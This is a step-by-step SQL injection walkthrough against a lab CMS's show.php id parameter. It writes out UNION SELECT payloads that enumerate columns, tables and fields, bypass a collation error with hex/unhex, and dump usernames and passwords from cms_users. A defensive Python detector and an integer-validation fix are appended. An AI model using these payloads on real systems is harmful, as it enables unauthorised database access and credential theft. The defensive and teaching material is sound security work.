1. First determine whether the injection point is string-type or numeric-type.
It turns out to be numeric-type.
2. Enumerate the number of columns: id=32 order by 15
3. Find which columns are echoed back to the page: id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Only positions 3 and 11 are echoed, so we use those two positions to retrieve the database name:
?id=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15
4. Get the table names
id=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15%20 from information_schema.tables where table_schema=database()
The page reports an "illegal mix of collations" error for the UNION query.
Here I first tried encoding the schema name cms as a hexadecimal literal:
http://192.168.221.136/cms/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10, group_concat(table_name),12,13,14,15 from information_schema.tables where table_schema=0x636d73
That did not work.
Next, try bypassing the error with the hex() and unhex() functions:
http://192.168.221.136/cms/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,unhex(hex(group_concat(table_name))),12,13,14,15 from information_schema.tables where table_schema=0x636d73
5. Next, get the columns of the cms_users table
union select 1,2,3,4,5,6,7,8,9,10,unhex(hex(group_concat(column_name))),12,13,14,15 from information_schema.columns where table_schema='cms' and table_name='cms_users'
6. Finally, query the column contents
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(userid,'~',username,'~',password),12,13,14,15 from cms_users
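From the defender's side, every request in the walkthrough above fails the one check show.php should have made: a numeric id parameter must be an integer. The following is an added example (not code from the original post) that applies that strict integer check and additionally flags the indicators seen above (UNION SELECT, information_schema lookups, the 0x636d73 hex literal standing in for 'cms', and the unhex(hex(...)) wrapper used to dodge the collation error) over constructed Apache-style log lines replaying the same requests; the log lines, host name and regexes are assumptions of the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Indicators taken from the walkthrough: a UNION SELECT column list,
# information_schema lookups, a hex literal in place of the schema name
# ('cms' -> 0x636d73) and the unhex(hex(...)) collation-error bypass.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "unhex_hex_wrapper": re.compile(r"\bunhex\s*\(\s*hex\s*\(", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
INTEGER = re.compile(r"-?\d{1,10}")  # the only shape a numeric id may take


def analyze_request(raw_url: str, numeric_params=("id",)) -> dict:
    """Classify one request URL. The strict integer check on numeric
    parameters is the same validation the application itself should do
    (e.g. casting id to int) before the value ever reaches the query."""
    query = urlsplit(raw_url).query
    params = parse_qs(query, keep_blank_values=True)  # percent-decodes values
    invalid = [p for p in numeric_params
               if p in params and not INTEGER.fullmatch(params[p][0].strip())]
    decoded = unquote_plus(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    verdict = "ok" if not invalid and not hits else "sqli_suspected"
    return {"verdict": verdict, "invalid_numeric": invalid, "indicators": hits}


# Constructed Apache combined-format log lines (not from the original page):
# a benign request, the ORDER BY probe, and the hex/unhex table-name request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/show.php?id=32 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cms/show.php?id=32%20order%20by%2015 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /cms/show.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,unhex(hex(group_concat(table_name))),12,13,14,15%20from%20information_schema.tables%20where%20table_schema=0x636d73 HTTP/1.1" 200 740 "-" "Mozilla/5.0"
"""
REQUEST_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_log(text: str) -> list:
    """Run analyze_request over each log line; return (path, result) for hits."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RX.search(line)
        if m:
            result = analyze_request("http://host" + m.group(1))  # host is a placeholder
            if result["verdict"] != "ok":
                alerts.append((m.group(1), result))
    return alerts
```

Note that the ORDER BY probe carries none of the keyword indicators and is caught only by the integer check, which is why the application-side fix (validate or cast id to int, or use a prepared statement) matters more than any signature list.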